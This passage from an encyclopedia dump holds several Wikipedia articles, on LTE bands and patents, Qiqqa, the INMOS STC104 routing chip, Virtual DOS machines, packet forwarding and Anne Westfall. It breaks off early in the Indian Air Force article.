demands at least AMR-NB codec (narrow band), but the recommended speech codec for VoLTE is Adaptive Multi-Rate Wideband, also known as HD Voice. This codec is mandated in 3GPP networks that support 16 kHz sampling. Fraunhofer IIS has proposed and demonstrated "Full-HD Voice", an implementation of the AAC-ELD (Advanced Audio CodingEnhanced Low Delay) codec for LTE handsets. Where previous cell phone voice codecs only supported frequencies up to 3.5 kHz and upcoming wideband audio services branded as HD Voice up to 7 kHz, Full-HD Voice supports the entire bandwidth range from 20 Hz to 20 kHz. For end-to-end Full-HD Voice calls to succeed, however, both the caller and recipient's handsets, as well as networks, have to support the feature. Frequency bands The LTE standard covers a range of many different bands, each of which is designated by both a frequency and a band number: North America 600, 700, 850, 1700, 1900, 2300, 2500, 2600, 3500, 5000 MHz (bands 2, 4, 5, 7, 12, 13, 14, 17, 25, 26, 29, 30, 38, 40, 41, 42, 43, 46, 48, 66, 71) Latin America and Caribbean 600, 700, 800, 850, 900, 1700, 1800, 1900, 2100, 2300, 2500, 2600, 3500, 5000 MHz (bands 1, 2, 3, 4, 5, 7, 8, 12, 13, 14, 17, 20, 25, 26, 28, 29, 38, 40, 41, 42, 43, 46, 48, 66, 71) Europe 450, 700, 800, 900, 1500, 1800, 2100, 2300, 2600, 3500, 3700 MHz (bands 1, 3, 7, 8, 20, 22, 28, 31, 32, 38, 40, 42, 43) Asia 450, 700, 800, 850, 900, 1500, 1800, 1900, 2100, 2300, 2500, 2600, 3500 MHz (bands 1, 3, 5, 7, 8, 11, 18, 19, 20, 21, 26, 28, 31, 38, 39, 40, 41, 42) Africa 700, 800, 850, 900, 1800, 2100, 2500, 2600 MHz (bands 1, 3, 5, 7, 8, 20, 28, 41) Oceania (incl. Australia and New Zealand) 700, 800, 850, 1800, 2100, 2300, 2600 MHz (bands 1, 3, 7, 12, 20, 28, 40) As a result, phones from one country may not work in other countries. Users will need a multi-band capable phone for roaming internationally. Patents According to the European Telecommunications Standards Institute's (ETSI) intellectual property rights (IPR) database, about 50 companies have declared, as of March 2012, holding essential patents covering the LTE standard. The ETSI has made no investigation on the correctness of the declarations however, so that "any analysis of essential LTE patents should take into account more than ETSI declarations." Independent studies have found that about 3.3 to 5 percent of all revenues from handset manufacturers are spent on standard-essential patents. This is less than the combined published rates, due to reduced-rate licensing agreements, such as cross-licensing. See also 4G-LTE filter Comparison of wireless data standards E-UTRAthe radio access network used in LTE HSPA+an enhancement of the 3GPP HSPA standard Flat IPflat IP architectures in mobile networks LTE-A Pro LTE-A LTE-U NarrowBand IoT (NB-IoT) Simulation of LTE Networks QoS Class Identifier (QCI) the mechanism used in LTE networks to allocate proper Quality of Service to bearer traffic System architecture evolutionthe re-architecturing of core networks in LTE WiMAXa competitor to LTE References Further reading Agilent Technologies, LTE and the Evolution to 4G Wireless: Design and Measurement Challenges, John Wiley & Sons, 2009 Beaver, Paul, "What is TD-LTE?", RF&Microwave Designline, September 2011. E. Dahlman, H. Ekström, A. Furuskär, Y. Jading, J. Karlsson, M. Lundevall, and S. Parkvall, "The 3G Long-Term EvolutionRadio Interface Concepts and Performance Evaluation", IEEE Vehicular Technology Conference (VTC) 2006 Spring, Melbourne, Australia, May 2006 Erik Dahlman, Stefan Parkvall, Johan Sköld, Per Beming, 3G EvolutionHSPA and LTE for Mobile Broadband, 2nd edition, Academic Press, 2008, Erik Dahlman, Stefan Parkvall, Johan Sköld, 4GLTE/LTE-Advanced for Mobile Broadband, Academic Press, 2011, Sajal K. Das, John Wiley & Sons (April 2010): Mobile Handset Design, . Sajal K. Das, John Wiley & Sons (April 2016): Mobile Terminal Receiver Design: LTE and LTE-Advanced, . H. Ekström, A. Furuskär, J. Karlsson, M. Meyer, S. Parkvall, J. Torsner, and M. Wahlqvist, "Technical Solutions for the 3G Long-Term Evolution", IEEE Commun. Mag., vol. 44, no. 3, March 2006, pp. 38–45 Mustafa Ergen, Mobile Broadband: Including WiMAX and LTE, Springer, NY, 2009 K. Fazel and S. Kaiser, Multi-Carrier and Spread Spectrum Systems: From OFDM and MC-CDMA to LTE and WiMAX, 2nd Edition, John Wiley & Sons, 2008, Dan Forsberg, Günther Horn, Wolf-Dietrich Moeller, Valtteri Niemi, LTE Security, Second Edition, John Wiley & Sons Ltd, Chichester 2013, Borko Furht, Syed A. Ahson, Long Term Evolution: 3GPP LTE Radio and Cellular Technology, CRC Press, 2009, Chris Johnson, LTE in BULLETS, CreateSpace, 2010, F. Khan, LTE for 4G Mobile BroadbandAir Interface Technologies and Performance, Cambridge University Press, 2009 Guowang Miao, Jens Zander, Ki Won Sung, and Ben Slimane, Fundamentals of Mobile Data Networks, Cambridge University Press, 2016, Stefania Sesia, Issam Toufik, and Matthew Baker, LTEThe UMTS Long Term Evolution: From Theory to Practice, Second Edition including Release 10 for LTE-Advanced, John Wiley & Sons, 2011, Gautam Siwach, Dr Amir Esmailpour, "LTE Security Potential Vulnerability and Algorithm Enhancements", IEEE Canadian Conference on Electrical and Computer Engineering (IEEE CCECE), Toronto, Canada, May 2014 SeungJune Yi, SungDuck Chun, YoungDae lee, SungJun Park, SungHoon Jung, Radio Protocols for LTE and LTE-Advanced, Wiley, 2012, Y. Zhou, Z. Lei and S. H. Wong, Evaluation of Mobility Performance in 3GPP Heterogeneous Networks 2014 IEEE 79th Vehicular Technology Conference (VTC Spring), Seoul, 2014, pp. 1–5. External links LTE homepage from the 3GPP website LTE Frequently Asked Questions LTE Deployment Map A Simple Introduction to the LTE Downlink LTE-3GPP.info: online LTE messages decoder fully supporting Rel.14 Wireless networking standards Japanese inventions Mobile telecommunications Mobile telecommunications standards Telecommunications
27388002
https://en.wikipedia.org/wiki/Qiqqa
Qiqqa
Qiqqa (pronounced "Quicker") is a free and opensource software that allows researchers to work with thousands of PDFs. It combines PDF reference management tools, a citation manager, and a mind map brainstorming tool. It integrates with Microsoft Word XP, 2003, 2007 and 2010 and BibTeX/LaTeX to automatically produce citations and bibliographies in thousands of styles. The development of Qiqqa began in Cambridge, UK, in December 2009. A public alpha was released in April 2010, offering PDF management and brainstorming capabilities. Subsequent releases have seen the incorporation of the Web Library, OCR, integration with BibTeX and other reference managers, and the use of natural language processing (NLP) techniques to guide researchers in their reading. Shortly after its release, Qiqqa has been noticed by universities and their libraries. In 2011, Qiqqa won both the University of Cambridge CUE and CUTEC, and the Cambridge Wireless Discovering Start-Ups competitions. Qiqqa was an award winner in the 2012 Santander Universities Entrepreneurship Awards. In 2020, Qiqqa decided to change software pricing model and make it free and opensource: "After 10 years of your support we have decided to make Qiqqa open source so that it can be grown and extended by its community of thousands of active users." Qiqqa does not seem to have attracted a large user base, compared to other recent reference management programs developed from 2006 to date. See also Comparison of reference management software Computer-assisted qualitative data analysis software References External links Document management systems Free BibTeX software Free note-taking software Free reference management software Mind-mapping software Note-taking software PDF readers QDA software Reference management software Software that uses XUL
51050694
https://en.wikipedia.org/wiki/STC104
STC104
The STC104 switch, also known as the C104 switch in its early phases, is an asynchronous packet-routing chip that was designed for building high-performance point-to-point computer communication networks. It was developed by INMOS in the 1990s and was the first example of a general-purpose production packet routing chip. It was also the first routing chip to implement wormhole routing, to decouple packet size from the flow-control protocol, and to implement interval and two-phase randomized routing. The STC104 has 32 bidirectional communication links, called DS-Links, that each operate at 100 Mbit/s. These links are connected by a non-blocking crossbar that allows simultaneous transmission of packets between all input and output links. Switching The STC104 uses wormhole switching to reduce latency and the per-link buffering requirement. Wormhole switching works by splitting packets into fixed-size chunks (called flits) for transmission, allowing the packet to be pipelined in the network. The first header flit opens a route (or circuit) through each switch in the network, allowing subsequent flits to experience no switching delay. The final flit closes the route. Since the header flit can proceed independently of the subsequent flits, the latency of the packet is independent of its size. Consequently, the amount of buffering provided by links can also be chosen independently of the packet size. Furthermore, the total buffering requirement is small since, typically, only a small number of flits need to be stored for each link. This is in contrast to store-and-forward switching, where a whole packet must be buffered at each link end point. Routing Messages are routed in networks of C104s using interval routing. In a network where each destination is uniquely numbered, interval routing associates non-overlapping, contiguous ranges of destinations with each output link. An output link for a packet is chosen by comparing the destination (contained in the packet's header) to each interval and choosing the one that contains the destination. The benefits of interval routing are that it is sufficient to provide deterministic routing on a range of network topologies and that can be implemented simply with a table-based lookup, so it delivers routing decisions with low latency. Interval routing can be used to implement efficient routing strategies for many classes of regular network topology. In some networks, multiple links will connect to the same STC104 or processor endpoint, or to a set of equivalent devices. In this circumstance, the STC104 provides a mechanism for grouped adaptive routing, where bundles of links can share the same interval and a link is chosen adaptively from a bundle based on its availability. This mechanism makes efficient use of the available link bandwidth by ensuring a packet does not wait for a link while another equivalent one is available. An additional ability of interval routing is to partition the network into independent sub networks. This can be used to prevent deadlock or to separate high-priority traffic to travel without contention. Header deletion To support routing in hierarchical networks, such as multi-stage butterfly or Clos networks, the STC104 provides a mechanism for header deletion. Each output link that is connected to the next level of the hierarchy can be programmed to discard the header, so that the packet is subsequently routed by the new packet header, which immediately precedes the deleted one. Header deletion can also be used to implement two-phase randomized routing. Two-phase randomized routing is a method for preventing network contention and it works by routing packets to a randomly chosen intermediate node, before routing it to the destination. The effect is to reduce all traffic to an average worst case with predictable latency and bandwidth. Two-phase randomized routing is implemented by the STC104 by setting up links where traffic enters the network to prepend a header with a random destination. The destination is another STC104 device, which recognises the header and discards it before routing it to its actual destination. Since randomly routing messages via an intermediate destination can create cyclic dependencies between different packets, deadlock can occur. However, deadlock can be avoided by partitioning the network into two components: one for the randomizing phase and one for the destination phase. Network topologies The STC104 can be used to construct a variety of network topologies, including multi-dimensional grids and tori, hypercubes and Clos networks (and the closely related Fat tree). DS Links The STC104 links are called DS-Links. A single DS-Link is a unidirectional, asynchronous, flow-controlled connection that operates serially, with a bandwidth of up to 100 MBits/s. Physically, a DS-Link is implemented with two wires: a data wire that carries the signal and a strobe that changes only when the data does not. The strobe signal allows the transmitter's clock to be recovered by the receiver, and for the receiver to synchronise to it. This allows the transmitter and receiver to maintain their own clocks with potentially varying frequency and phase. A DS-Link implements transfer of data on the wires using a token protocol. A token can either carry one byte of data or a control message, such as flow control, end of packet, end of message. A single bit distinguishes the token type and an additional parity is used for error detection. A byte is therefore encoded in 10 bits and a control token is encoded in 4 bits. Each DS-link has a buffer large enough to store eight tokens. To prevent a tokens from being received when the buffer is full, a token-level flow control mechanism is used. This mechanism automatically sends control tokens to the sender when there is space in the buffer. Microarchitecture The STC104 can be classified as a special-purpose MIMD processor with distributed control. The main components are 32 link slices that are connected to the crossbar, and logic for global services such as initialisation and reset. Each link slice provides a single input and output with a pair of DS-Links and additional logic to implement the routing functionality and provide buffering. The link slices operate concurrently and independently, with their state determined only by their configuration parameters and the data flowing through them. Physical implementation The STC104 was designed and manufactured on a 1.0 micron CMOS process (SGS-Thomson HCMOS4) with three metal layers for routing. The chip had an area of approximately 204.6mm2, had 1.875 million transistors and dissipated up to 5 W of power, operating at 50 MHz. Notes References See also Transputer Inmos Communicating sequential processes External links Networks, Routers and Transputers: Function, Performance and Applications SGS-Thompson Microelectronics, STC104 asynchronous packet switch engineering data David May's Transputer Page Flow control (data) Switches Routing
1501173
https://en.wikipedia.org/wiki/Virtual%20DOS%20machine
Virtual DOS machine
Virtual DOS machines (VDM) refer to a technology that allows running 16-bit/32-bit DOS and 16-bit Windows programs when there is already another operating system running and controlling the hardware, and is a userland that originated in earlier versions of Windows and included up to Windows 10. Overview Virtual DOS machines can operate either exclusively through typical software emulation methods (e.g. dynamic recompilation) or can rely on the virtual 8086 mode of the Intel 80386 processor, which allows real mode 8086 software to run in a controlled environment by catching all operations which involve accessing protected hardware and forwarding them to the normal operating system (as exceptions). The operating system can then perform an emulation and resume the execution of the DOS software. VDMs generally also implement support for running 16- and 32-bit protected mode software (DOS extenders), which has to conform to the DOS Protected Mode Interface (DPMI). When a DOS program running inside a VDM needs to access a peripheral, Windows will either allow this directly (rarely), or will present the DOS program with a virtual device driver (VDD) which emulates the hardware using operating system functions. A VDM will systematically have emulations for the Intel 8259A interrupt controllers, the 8254 timer chips, the 8237 DMA controller, etc. Concurrent DOS 8086 emulation mode In January 1985 Digital Research together with Intel previewed Concurrent DOS 286 1.0, a version of Concurrent DOS capable of running real mode DOS programs in the 80286's protected mode. The method devised on B-1 stepping processor chips, however, in May 1985 stopped working on the C-1 and subsequent processor steppings shortly before Digital Research was about to release the product. Although with the E-1 stepping Intel started to address the issues in August 1985, so that Digital Research's "8086 emulation mode" worked again utilizing the undocumented LOADALL processor instruction, it was too slow to be practical. Microcode changes for the E-2 stepping improved the speed again. This early implementation can be seen as a predecessor to actual virtual DOS machines. Eventually, Concurrent DOS 286 was reworked from a potential desktop operating system to become FlexOS 286 for industrial use in 1986. It was also licensed by IBM for their 4680 OS in 1986. When Intel's 80386 with its virtual 8086 mode became available (as samples since October 1985 and in quantities since June 1986), Digital Research switched to use this to run real mode DOS programs in virtual DOS machines in protected mode under Concurrent DOS 386 1.0 (February 1987) and FlexOS 386 1.0 (June 1987). However, the architecture of these multiuser multitasking protected mode operating systems was not DOS-based by themselves. Concurrent DOS 386 was later developed to become Multiuser DOS (since 1991) and REAL/32 (since 1995). FlexOS 386 later became 4690 OS in 1993. DOS-based VDMs In contrast to these protected mode operating systems, DOS, by default, is a real-mode operating system, switching to protected mode and virtual 86 mode only on behalf of memory managers and DOS extenders in order to provide access to extended memory or map in memory into the first megabyte, which is accessible to normal DOS programs. DOS-based VDMs appeared with Microsoft's Windows/386 2.01 in September 1987. DOS-based virtual DOS machines were also present in Windows 3.0, 3.1x and Windows for Workgroups 3.1x running in 386 Enhanced Mode as well as in Windows 95, 98, 98 SE and ME. One of the characteristics of these solutions running on top of DOS is that the memory layout shown inside virtual DOS machines are virtual instances of the DOS system and DOS driver configuration run before the multitasker is loaded, and that requests which cannot be handled in protected mode are passed down into the system domain to be executed by the underlying DOS system. Similar to Windows 3.x 386 Enhanced Mode in architecture, EMM386 3.xx of Novell DOS 7, Caldera OpenDOS 7.01, DR-DOS 7.02 (and later) also uses DOS-based VDMs to support pre-emptive multitasking of multiple DOS applications, when the EMM386 /MULTI option is used. This component has been under development at Digital Research / Novell since 1991 under the codename "Vladivar" (originally a separate device driver KRNL386.SYS instead of a module of EMM386). While primarily developed for the next major version of DR DOS, released as Novell DOS 7 in 1994, it was also used in the never released DR DOS "Panther" and "Star Trek" project in 1992/1993. OS/2 MVDM VDMs called MVDM (Multiple Virtual DOS Machine) are used in OS/2 2.0 and later since 1992. OS/2 MVDMs are considerably more powerful than NTVDM. For example, block devices are supported, and various DOS versions can be booted into an OS/2 MVDM. While the OS/2 1.x DOS box was based on DOS 3.0, OS/2 2.x MVDMs emulate DOS 5.0. Seamless integration of Windows 3.1 and later Win32s applications in OS/2 is a concept looking similar on surface to the seamless integration of XP Mode based on Windows Virtual PC in Windows 7. A redirector in a "guest" VDM or NTVDM allows access on the disks of the OS/2 or NT "host". Applications in a "guest" can use named pipes for communication with their "host". Due to a technical limitation, DOS and 16-bit Windows applications under OS/2 were unable to see more than 2 GB of hard drive space, this was fixed in ArcaOS 5.0.4. Windows NTVDM NTVDM is a system component of all IA-32 editions of the Windows NT family from 1993 with the release of Windows NT 3.1 until 2015 with its final appearance in Windows 10, which allows execution of 16-bit Windows and 16-bit / 32-bit DOS applications. It is not included with 64-bit versions. The Windows NT 32-bit user-mode executable which forms the basis for a single DOS (or Windows 3.x) environment is called ntvdm.exe. In order to execute DOS programs, NTVDM loads NTIO.SYS which in turn loads NTDOS.SYS, which executes a modified COMMAND.COM in order to run the application that was passed to NTVDM as command-line argument. The 16-bit real-mode system files are stripped down derivations of their MS-DOS 5.0 equivalents IO.SYS, MSDOS.SYS and COMMAND.COM with all hard-wired assumptions on the FAT file system removed and using the invalid opcode 0xC4 0xC4 to bop down into the 32-bit NTVDM to handle the requests. Originally, NTDOS reported a DOS version of 30.00 to programs, but this was soon changed to report a version of 5.00 at INT 21h/AH=30h and 5.50 at INT 21h/AX=3306h to allow more programs to run unmodified. This holds true even in the newest releases of Windows; many additional MS-DOS functions and commands introduced in MS-DOS versions 6.x and in Windows 9x are missing. 16-bit Windows applications by default all run in their own thread within a single NTVDM process. Although NTVDM itself is a 32-bit process and pre-emptively multitasked with respect to the rest of the system, the 16-bit applications within it are cooperatively multitasked with respect to each other. When the "Run in separate memory space" option is checked in the Run box or the application's shortcut file, each 16-bit Windows application gets its own NTVDM process and is therefore pre-emptively multitasked with respect to other processes, including other 16-bit Windows applications. NTVDM emulates BIOS calls and tables as well as the Windows 3.1 kernel and 16-bit API stubs. The 32-bit WoW translation layer thunks 16-bit API routines. 32-bit DOS emulation is present for DOS Protected Mode Interface (DPMI) and 32-bit memory access. This layer converts the necessary extended and expanded memory calls for DOS functions into Windows NT memory calls. wowexec.exe is the emulation layer that emulates 16-bit Windows. Windows 2000 and Windows XP added Sound Blaster 2.0 emulation. 16-bit virtual device drivers and DOS block device drivers (e.g., RAM disks) are not supported. Inter-process communication with other subsystems can take place through OLE, DDE and named pipes. Since virtual 8086 mode is not available on non-x86-based processors (more specifically, MIPS, DEC Alpha, and PowerPC) NTVDM was instead implemented as a full emulator in these versions of NT, using code licensed from Insignia's SoftPC. Up to Windows NT 3.51, only 80286 emulation was available. With Windows NT 4.0, 486 emulation was added. With Windows 11 dropping support for 32-bit IA-32 processors, development of NTVDM has been discontinued. Commands The following list of commands is part of the Windows XP MS-DOS subsystem. APPEND DEBUG EDIT EDLIN EXE2BIN FASTOPEN FORCEDOS GRAPHICS LOADFIX LOADHIGH (LH) MEM NLSFUNC SETVER SHARE Security issue In January 2010, Google security researcher Tavis Ormandy revealed a serious security flaw in Windows NT's VDM implementation that allowed unprivileged users to escalate their privileges to SYSTEM level, noted as applicable to the security of all x86 versions of the Windows NT kernel since 1993. This included all 32-bit versions of Windows NT, 2000, XP, Server 2003, Vista, Server 2008, and Windows 7. Ormandy published a proof-of-concept exploit for the vulnerability. Prior to Microsoft's release of a security patch, the workaround for this issue was to turn off 16-bit application support, which prevented older programs (those written for DOS and Windows 3.1) from running. 64-bit versions of Windows were not affected since NTVDM subsystem is not installed by default. Once the Microsoft security patches had been applied to the affected operating systems the VDM could be safely reenabled. Limitations A limitation exists in the Windows XP 16-bit subsystem (but not in earlier versions of Windows NT) because of the raised per-session limit for GDI objects which causes GDI handles to be shifted to the right by two bits, when converting them from 32 to 16 bits. As a result, the actual handle cannot be larger than 14 bits and consequently 16-bit applications that happen to be served a handle larger than 16384 by the GDI system crash and terminate with an error message. In an x86-64 CPU, virtual 8086 mode is available as a sub-mode only in its legacy mode (for running 16- and 32-bit operating systems), not in the native 64-bit long mode. The NTVDM is not supported on x86-64 editions of Windows, including DOS programs, because NTVDM uses VM86 CPU mode instead of the Local Descriptor Table in order to enable 16‑bits segment required for addressing and AArch64 because Microsoft did not release a full emulator for this incompatible instruction set like it did on previous incompatible architecture. However, they can still be run using virtualization software, like Windows XP Mode in Windows 7 or VMware Workstation, or by installing NTVDMx64, an unofficial port of the older emulated implementation of the NTVDM which was provided on NT 4 for non-x86 platforms. Another option is OTVDM (WineVDM), a 16-bit Windows interpreter based on MAME's i386 emulation and the 16-bit part of the popular Windows compatibility layer Wine. In general, VDM and similar technologies do not satisfactorily run most older DOS games on today's computers. Emulation is only provided for the most basic peripherals, often implemented incompletely. For example, sound emulation in NTVDM is very limited. NT-family versions of Windows only update the real screen a few times per second when a DOS program writes to it, and they do not emulate higher resolution graphics modes. Because software mostly runs native at the speed of the host CPU, all timing loops will expire prematurely. This either makes a game run much too fast or causes the software not even to notice the emulated hardware peripherals, because it does not wait long enough for an answer. See also Comparison of platform virtualization software DESQview 386 (since 1988) Wine (software) DOSBox DOSEMU Merge (software) List of Microsoft Windows components Hypervisor Windows on Windows (WoW) Virtual machine (VM) Notes References Further reading External links Virtual DOS Machine Structure Troubleshooting MS-DOS-based programs in Windows XP Troubleshooting an MS-DOS application which hangs the NTVDM subsystem in Windows XP and Windows Server 2003 Troubleshooting MS-DOS-based serial communication programs in Windows 2000 and later MS-DOS Player for Win32-x64, a Microsoft MS-DOS Emulator, runs many command line DOS programs like compilers or other tools, also packaged into one stand-alone executable file. vDOS, a DOS emulator designed for the running the more "serious" DOS apps (not games) on 64-bit NT systems (effectively a replacement for NTVDM on modern systems). Virtualization software DOS technology Windows administration DOS emulators Windows components
1073520
https://en.wikipedia.org/wiki/Packet%20forwarding
Packet forwarding
Packet forwarding is the relaying of packets from one network segment to another by nodes in a computer network. The network layer in the OSI model is responsible for packet forwarding. Models The simplest forwarding modelunicastinginvolves a packet being relayed from link to link along a chain leading from the packet's source to its destination. However, other forwarding strategies are commonly used. Broadcasting requires a packet to be duplicated and copies sent on multiple links with the goal of delivering a copy to every device on the network. In practice, broadcast packets are not forwarded everywhere on a network, but only to devices within a broadcast domain, making broadcast a relative term. Less common than broadcasting, but perhaps of greater utility and theoretical significance, is multicasting, where a packet is selectively duplicated and copies delivered to each of a set of recipients. Networking technologies tend to naturally support certain forwarding models. For example, fiber optics and copper cables run directly from one machine to another to form a natural unicast mediadata transmitted at one end is received by only one machine at the other end. However, as illustrated in the diagrams, nodes can forward packets to create multicast or broadcast distributions from naturally unicast media. Likewise, traditional Ethernet (10BASE5 and 10BASE2, but not the more modern 10BASE-T) are natural broadcast mediaall the nodes are attached to a single long cable and a packet transmitted by one device is seen by every other device attached to the cable. Ethernet nodes implement unicast by ignoring packets not directly addressed to them. A wireless network is naturally multicast all devices within a reception radius of a transmitter can receive its packets. Wireless nodes ignore packets addressed to other devices, but require forwarding to reach nodes outside their reception radius. Decisions At nodes where multiple outgoing links are available, the choice of which, all, or any to use for forwarding a given packet requires a decision making process that, while simple in concept, is sometimes bewilderingly complex. Since a forwarding decision must be made for every packet handled by a node, the total time required for this can become a major limiting factor in overall network performance. Much of the design effort of high-speed routers and switches has been focused on making rapid forwarding decisions for large numbers of packets. The forwarding decision is generally made using one of two processes: routing, which uses information encoded in a device's address to infer its location on the network, or bridging, which makes no assumptions about where addresses are located and depends heavily on broadcasting to locate unknown addresses. The heavy overhead of broadcasting has led to the dominance of routing in large networks, particularly the Internet; bridging is largely relegated to small networks where the overhead of broadcasting is tolerable. However, since large networks are usually composed of many smaller networks linked together, it would be inaccurate to state that bridging has no use on the Internet; rather, its use is localized. Methods A node can use one of two different methods to forward packets: store-and-forward or cut-through switching. See also Equal-cost multi-path routing Forwarding information base Node-to-node data transfer Per-hop behaviour Port forwarding References Routing
1162451
https://en.wikipedia.org/wiki/Anne%20Westfall
Anne Westfall
Anne Westfall is an American game programmer and software developer, known for 1983's Archon: The Light and the Dark, originally written for the Atari 8-bit family. She is married to fellow game developer Jon Freeman. Both are founders of Free Fall Associates. Career Westfall began computer programming at the age of 30. Before moving into the video game industry, Westfall worked as a programmer for a civil engineering firm Morton Technology, where she developed the first microcomputer-based program designed to help lay out subdivisions. In 1981, Westfall and her husband, Jon, left Epyx, the video game developer and publisher her husband co-founded just three years earlier. Westfall cited a desire to learn assembly language and to work on the Atari 800 as one reason for their departure from Epyx. Together with game designer Paul Reiche III, they started Free Fall Associates to make computer games free of the politics existing at the now larger Epyx. Together with Jon and Reiche, she helped develop the two award-winning and highly acclaimed games Archon and Archon II, handling the brunt of the programming work. For six years, Westfall was on the board of directors of the Computer Game Developers Conference. Personal Westfall met Jon at the West Coast Computer Faire in 1980 while demonstrating her surveying program she wrote for the TRS-80. Her booth was next to that of Automated Simulations—later Epyx—where Jon was working. After dating for about six months, Freeman convinced Westfall to move closer and come to work at his company. See also List of women in the video game industry Women and video games Women in computing References External links MobyGames' entry on Westfall Free Fall Associates chapter of Halcyon Days: Interviews with Classic Computer and Video Game Programmers American computer programmers Video game programmers Year of birth missing (living people) Living people Women video game programmers Computer programmers
403355
https://en.wikipedia.org/wiki/Indian%20Air%20Force
Indian Air Force
The Indian Air Force (IAF) is the air arm of the Indian Armed Forces. Its complement of personnel and aircraft assets ranks fourth amongst the air forces of the world. Its primary mission is to secure Indian airspace and to conduct aerial warfare during armed conflict. It was officially established on 8 October 1932 as an auxiliary air force of the British Empire which honoured India's aviation service during World War II with the prefix Royal. After India gained independence from United Kingdom in 1947, the name Royal Indian Air Force was kept and served in the name of Dominion of India. With the government's transition to a Republic in 1950, the prefix Royal was removed. Since 1950, the IAF has been involved in four wars with neighbouring Pakistan. Other major operations undertaken by the IAF include Operation Vijay, Operation Meghdoot, Operation Cactus and Operation Poomalai. The IAF's mission expands beyond engagement with hostile forces, with the IAF participating in United Nations peacekeeping missions. The President of India holds the rank of Supreme Commander of the IAF. , 1,39,576 personnel are in service with the Indian Air Force. The Chief of the Air Staff, an air chief marshal, is a four-star officer and is responsible for the bulk of operational command of the Air Force. There is never more than one serving ACM at any given time in the IAF. The rank of Marshal of the Air Force has been conferred by the President of India on one occasion in history, to Arjan Singh. On 26 January 2002, Singh became the first and so far, only five-star rank officer of the IAF. Mission The IAF's mission is defined by the Armed Forces Act of 1947, the Constitution of India, and the Air Force Act of 1950. It decrees that in the aerial battlespace: Defence of India and every part there of including preparation for defence and all such acts as may be conducive in times of war to its prosecution and after its termination to effective demobilisation. In practice, this is taken as a directive meaning the IAF bears the responsibility of safeguarding Indian airspace and thus furthering national interests in conjunction with the other branches of the armed forces. The IAF provides close air support to the Indian Army troops on the battlefield as well as strategic and tactical airlift capabilities. The Integrated Space Cell is operated by the Indian Armed Forces, the civilian Department of Space, and the Indian Space Research Organisation. By uniting the civilian run space exploration organisations and the military faculty under a single Integrated Space Cell the military is able to efficiently benefit from innovation in the civilian sector of space exploration, and the civilian departments benefit as well. The Indian Air Force, with highly trained crews, pilots, and access to modern military assets provides India with the capacity to provide rapid response evacuation, search-and-rescue (SAR) operations, and delivery of relief supplies to affected areas via cargo aircraft. The IAF provided extensive assistance to relief operations during natural calamities such as the Gujarat cyclone in 1998, the tsunami in 2004, and North India floods in 2013. The IAF has also undertaken relief missions such as Operation Rainbow in Sri Lanka. History Formation and early pilots The Indian Air Force was established on 8 October 1932 in British India as an auxiliary air force of the Royal Air Force. The enactment of the Indian Air Force Act 1932 stipulated out their auxiliary status and enforced the adoption of the Royal Air Force uniforms, badges, brevets and insignia. On 1 April 1933, the IAF commissioned its first squadron, No.1 Squadron, with four Westland Wapiti biplanes and five Indian pilots. The Indian pilots were led by British RAF Commanding officer Flight Lieutenant (later Air Vice Marshal) Cecil Bouchier. World War II (1939–1945) During World War II, the IAF played an instrumental role in halting the advance of the Japanese army in Burma, where the first IAF air strike was executed. The target for this first mission was the Japanese military base in Arakan, after which IAF strike missions continued against the Japanese airbases at Mae Hong Son, Chiang Mai and Chiang Rai in northern Thailand. The IAF was mainly involved in strike, close air support, aerial reconnaissance, bomber escort and pathfinding missions for RAF and USAAF heavy bombers. RAF and IAF pilots would train by flying with their non-native air wings to gain combat experience and communication proficiency. Besides operations in the Burma Theatre IAF pilots participated in air operations in North Africa and Europe. In addition to the IAF, many native Indians and some 200 Indians resident in Britain volunteered to join the RAF and Women's Auxiliary Air Force. One such volunteer was Sergeant Shailendra Eknath Sukthankar, who served as a navigator with No. 83 Squadron. Sukthankar was commissioned as an officer, and on 14 September 1943, received the DFC. Squadron Leader Sukthankar eventually completed 45 operations, 14 of them on board the RAF Museum’s Avro Lancaster R5868. Another volunteer was Assistant Section Officer Noor Inayat Khan a Muslim pacifist and Indian nationalist who joined the WAAF, in November 1940, to fight against Nazism. Noor Khan served bravely as a secret agent with the Special Operations Executive (SOE) in France, but was eventually betrayed and captured. Many of these Indian airmen were seconded or transferred to the expanding IAF such as Squadron Leader Mohinder Singh Pujji DFC who led No. 4 Squadron IAF in Burma. During the war, the IAF experienced a phase of steady expansion. New aircraft added to the fleet included the US-built Vultee Vengeance, Douglas Dakota, the British Hawker Hurricane, Supermarine Spitfire, and Westland Lysander. In recognition of the valiant service by the IAF, King George VI conferred the prefix "Royal" in 1945. Thereafter the IAF was referred to as the Royal Indian Air Force. In 1950, when India became a republic, the prefix was dropped and it reverted to being the Indian Air Force. First years of independence (1947–1950) After it became independent from the British Empire in 1947, British India was partitioned into the new states of the Dominion of India and the Dominion of Pakistan. Along the lines of the geographical partition, the assets of the air force were divided between the new countries. India's air force retained the name of the Royal Indian Air Force, but three of the ten operational squadrons and facilities, located within the borders of Pakistan, were transferred to the Royal Pakistan Air Force. The RIAF Roundel was changed to an interim 'Chakra' roundel derived from the Ashoka Chakra. Around the same time, conflict broke out between them over the control of the princely state of Jammu & Kashmir. With Pakistani forces moving into the state, its Maharaja decided to accede to India in order to receive military help. The day after, the Instrument of Accession was signed, the RIAF was called upon to transport troops into the war zone. And this was when a good management of logistics came into help. This led to the eruption of full-scale war between India and Pakistan, though there was no formal declaration of war. During the war, the RIAF did not engage the Pakistan Air Force in air-to-air combat; however, it did provide effective transport and close air support to the Indian troops. When India became a republic in 1950, the prefix 'Royal' was dropped from the Indian Air Force. At the same time, the current IAF roundel was adopted. Congo crisis and Annexation of Goa (1960–1961) The IAF saw significant conflict in 1960, when Belgium's 75-year rule over Congo ended abruptly, engulfing the nation in widespread violence and rebellion. The IAF activated No. 5 Squadron, equipped with English Electric Canberra, to support the United Nations Operation in the Congo. The squadron started undertaking operational missions in November. The unit remained there until 1966, when the UN mission ended. Operating from Leopoldville and Kamina, the Canberras soon destroyed the rebel Air Force and provided the UN ground forces with its only long-range air support force. In late 1961, the Indian government decided to attack the Portuguese colony of Goa after years of disagreement between New Delhi and Lisbon. The Indian Air Force was requested to provide support elements to the ground force in what was called Operation Vijay. Probing flights by some fighters and bombers were carried out from 8–18 December to draw out the Portuguese Air Force, but to no avail. On 18 December, two waves of Canberra bombers bombed the runway of Dabolim airfield taking care not to bomb the Terminals and the ATC tower. Two Portuguese transport aircraft (a Super Constellation and a DC-6) found on the airfield were left alone so that they could be captured intact. However the Portuguese pilots managed to take off the aircraft from the still damaged airfield and made their getaway to 